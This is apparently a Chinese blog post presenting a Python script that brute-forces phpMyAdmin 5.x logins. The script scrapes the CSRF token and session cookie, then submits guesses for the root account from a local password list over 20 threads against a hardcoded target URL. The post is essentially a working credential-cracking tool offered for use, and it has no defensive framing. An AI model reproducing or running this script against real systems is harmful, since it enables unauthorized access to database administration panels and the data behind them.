新版 phpMyAdmin 登陆爆破 python 脚本

Mr.Wu 2,745 0
差不多 5.几的版本,都需要验证 cookie 和 token,之前的爆破方式都无法在爆破了
#coding=utf-8

import requests 
import re
import html
import time
import sys
from concurrent.futures import ThreadPoolExecutor,as_completed
from tqdm import tqdm

url = "https://member.sss.com/phpmyadmin/index.php"

def crack_pass(passwd):
    req = requests.session()
    rep = req.get(url)
    token = re.findall(r'token" value="(.+?)"',rep.text)[0]
    token, sessions = html.unescape(token), rep.cookies['phpMyAdmin']
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
    data = {
       "set_session": sessions,
       "pma_username":"root",
       "pma_password":passwd,
       "server":1,
       "target":"index.php",
       "token":token,
    }
    rep = req.post(url, data=data, timeout=60, headers=headers)
    reptext = re.findall(r'<div id="pma_errors"><div class="error"><img src="themes/dot.gif" title="" alt="" class="icon ic_s_error" />(.+?)</div>',rep.text,re.S)
    if "ShowDatabasesNavigationAsTree" in rep.text:
       print(rep.status_code,passwd)
       sys.exit()
    return 0

with open(r"F:\back\pass\pass.txt","rb") as f:
    pass_list = f.read()
    pass_list = pass_list.split()

start_time = time.time()
with ThreadPoolExecutor(20) as pool:
    to_do = []
    for passwd in pass_list:
       passwd = passwd.decode()
       to_do.append(pool.submit(crack_pass, passwd))

    for future in tqdm(as_completed(to_do), total=len(pass_list)):
       pass

print('总共耗时: {} '.format(time.time()-start_time))

截图

新版 phpMyAdmin 登陆爆破 python 脚本

打赏
发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ